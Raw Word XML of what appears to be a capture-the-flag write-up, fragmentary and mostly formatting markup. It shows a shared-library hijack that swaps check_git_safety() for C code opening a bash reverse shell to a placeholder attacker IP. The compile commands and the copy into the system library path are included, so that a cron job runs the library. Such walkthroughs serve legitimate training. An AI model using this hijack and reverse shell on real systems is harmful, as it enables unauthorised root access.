    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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script uses a shared library. We can replace the library it is using with our own and override the function that the script uses — in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check_git_safety()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create this library on our machine and include a reverse shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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void check_git_safety() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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system("bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/443 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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73"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then compile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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gcc libgitutils.c -fpic -c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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gcc -shared -o libgitutils.so libgitutils.o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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87"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compiling, we can start a Python server and download our library into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6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Netcat listener to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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86"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copy our malicious library to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/lib/x86_64-linux-gnu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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cp libgitutils.so /lib/x86_64-linux-gnu/libgitutils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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56"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just wait for the cron job to execute so we can receive our shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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A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71"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read the last two flags.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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61"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db.sql | grep "uhc"</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2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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sectPr>
      <w:headerReference r:id="rId48" w:type="default"/>
      <w:headerReference r:id="rId49" w:type="first"/>
      <w:headerReference r:id="rId50" w:type="even"/>
      <w:footerReference r:id="rId51" w:type="default"/>
      <w:footerReference r:id="rId52" w:type="first"/>
      <w:footerReference r:id="rId5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IBM Plex Sans SemiBold">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9">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8" name="image16.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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AA">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AB">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Chuvinha</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14.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.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header" Target="header1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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training/training-machines/1"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6.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://readme.md/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=fHZKSCMWqF4" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/internetwache/GitTools.git" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.urldecode.org/" TargetMode="External"/><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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.ttf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemi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7.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PY3SjgEnMeh73iwWZjViJvygbg==">CgMxLjAaIwoBMBIeChwIB0IYCgtSb2JvdG8gTW9ubxIJTm92YSBNb25vMg5oLm1kNXgyOXhscThkaTIOaC53MWhjejh4anJ2ZjUyDmguNmdqeXlmd3lpdTAyMg5oLmxlM2FsY2F4ZGY0bzINaC55ejN4OGtsczZodzIOaC52Mng5N3N6OHptOGkyDmgudmYycXBjaTkxMm9yMg5oLmZqZzVvMnU5ZTd1cTIOaC4yOWJpNW4yemR2MmwyDmguZmYxdm01N2Rta2h4Mg5oLmZnZ2Z0OGJobTNicDIOaC4xNzVmNWNzOTR6MG84AHIhMVo1WnZPQnFucTR2bHVua05INzRGY0x4VEdDN3R2eW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